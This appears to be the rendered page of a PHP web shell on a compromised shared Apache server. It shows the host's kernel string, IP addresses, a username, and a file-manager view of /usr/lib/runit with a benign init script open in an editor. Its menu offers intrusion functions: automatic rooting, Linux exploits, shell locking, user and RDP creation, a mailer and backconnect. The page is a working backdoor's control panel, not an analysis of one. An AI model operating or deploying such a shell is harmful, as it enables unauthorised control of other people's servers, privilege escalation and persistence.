Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
runit /
[ HOME SHELL ]
Name
Size
Permission
Action
async-timeout
14.29
KB
-rwxr-xr-x
finish-default
750
B
-rwxr-xr-x
invoke-run
2.12
KB
-rwxr-xr-x
run_sysv_scripts
445
B
-rwxr-xr-x
runit-init
14.34
KB
-rwxr-xr-x
runlevel
174
B
-rwxr-xr-x
shutdown
14.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : run_sysv_scripts
#!/bin/sh -u # Deliberately NO `set -e'. See #923957. initdir="${1}" set +u if [ x = x$2 ]; then rcommand=start rX=S else rcommand=stop rX=K fi set -u for script in "$initdir/$rX"* ; do path=$(realpath "$script") name=$(basename "$path") # Special case for wicd. Runscript is called "wicd-daemon", # to match binary package name. [ -d "/etc/sv/$name" ] && continue [ -d "/etc/sv/$name-daemon" ] && continue "$script" "$rcommand" done
Close